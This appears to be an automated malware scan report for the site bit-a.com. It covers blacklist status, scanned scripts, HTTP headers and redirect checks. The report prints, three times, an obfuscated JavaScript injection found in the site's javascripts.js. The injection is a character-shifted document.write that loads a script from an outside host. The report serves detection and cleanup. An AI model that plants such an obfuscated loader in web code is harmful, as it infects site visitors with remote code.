Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bit-a.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bit-a.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bit-a.com/ | 200 OK Content-Length: 43002 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js | 200 OK Content-Length: 92556 Content-Type: text/javascript | clean |
http://bit-a.com/templates/js/mobilyslider.js | 200 OK Content-Length: 4589 Content-Type: application/x-javascript | clean |
http://bit-a.com/templates/js/init.js | 200 OK Content-Length: 282 Content-Type: application/x-javascript | clean |
http://skrepka.mk.ua/templates/highslide.js | 200 OK Content-Length: 50756 Content-Type: application/x-javascript | clean |
http://bit-a.com/templates/javascripts.js | 200 OK Content-Length: 22232 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isconfig = false; function Money(num) { var string = "" + num; if (string.indexOf('.') == -1) return string + '.00'; var seperation = string.length - string.indexOf('.'); if (seperation > 3) return string.substring(0,string.length-seperation+3); else if (seperation == 2) return string + '0'; return string; } function AddOne(store_id) { eval('max_order = document.s function FastBuy(store_id) { var line = 'fastbuy.php?store_id=' + store_id + '&'+phpsessid; window.open(line,'','top=100,left=100,width=500,height=500,scrollbars=no,location=no,toolbar=no,directories=no,status=yes,menubar=no,resizable=yes'); } <!-- js-tools --> q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://counter.rambler.ru/top100.jcn?1509635 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://bit-a.com/./ | 200 OK Content-Length: 43002 Content-Type: text/html | clean |
http://bit-a.com/./templates/js/mobilyslider.js | 200 OK Content-Length: 4589 Content-Type: application/x-javascript | clean |
http://bit-a.com/./templates/js/init.js | 200 OK Content-Length: 282 Content-Type: application/x-javascript | clean |
http://bit-a.com/./templates/javascripts.js | 200 OK Content-Length: 22232 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isconfig = false; function Money(num) { var string = "" + num; if (string.indexOf('.') == -1) return string + '.00'; var seperation = string.length - string.indexOf('.'); if (seperation > 3) return string.substring(0,string.length-seperation+3); else if (seperation == 2) return string + '0'; return string; } function AddOne(store_id) { eval('max_order = document.s function FastBuy(store_id) { var line = 'fastbuy.php?store_id=' + store_id + '&'+phpsessid; window.open(line,'','top=100,left=100,width=500,height=500,scrollbars=no,location=no,toolbar=no,directories=no,status=yes,menubar=no,resizable=yes'); } <!-- js-tools --> q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1)) <!-- /js-tools --> Antivirus reports:
| ||
http://bit-a.com/././ | 200 OK Content-Length: 43002 Content-Type: text/html | clean |
http://bit-a.com/././templates/js/mobilyslider.js | 200 OK Content-Length: 4589 Content-Type: application/x-javascript | clean |
http://bit-a.com/././templates/js/init.js | 200 OK Content-Length: 282 Content-Type: application/x-javascript | clean |
http://bit-a.com/././templates/javascripts.js | 200 OK Content-Length: 22232 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isconfig = false; function Money(num) { var string = "" + num; if (string.indexOf('.') == -1) return string + '.00'; var seperation = string.length - string.indexOf('.'); if (seperation > 3) return string.substring(0,string.length-seperation+3); else if (seperation == 2) return string + '0'; return string; } function AddOne(store_id) { eval('max_order = document.s function FastBuy(store_id) { var line = 'fastbuy.php?store_id=' + store_id + '&'+phpsessid; window.open(line,'','top=100,left=100,width=500,height=500,scrollbars=no,location=no,toolbar=no,directories=no,status=yes,menubar=no,resizable=yes'); } <!-- js-tools --> q=0;while(q<82)document.write(String.fromCharCode('=tdsjqu!tsd>#iuuq;00vnv/tbntv/sv0npevmft0npe`dfeubhnptuqpqvmbs0tubu/qiq#?=0tdsjqu?'.charCodeAt(q++)-1)) <!-- /js-tools --> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bit-a.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 05:17:15 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: MS_MSS=egvtfp1n0t39poca13m68f2pg0fjobng; path=/
Set-Cookie: bit_a_com__visitor=1403913599; expires=Mon, 30-Jun-2014 05:17:15 GMT; path=/; domain=.bit-a.com
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: bit-a.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 05:17:15 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: MS_MSS=egvtfp1n0t39poca13m68f2pg0fjobng; path=/
Set-Cookie: bit_a_com__visitor=1403913599; expires=Mon, 30-Jun-2014 05:17:15 GMT; path=/; domain=.bit-a.com
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bit-a.com
Referer: http://www.google.com/search?q=bit-a.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bit-a.com
Referer: http://www.google.com/search?q=bit-a.com
Result:
The result is similar to the first query. There are no suspicious redirects found.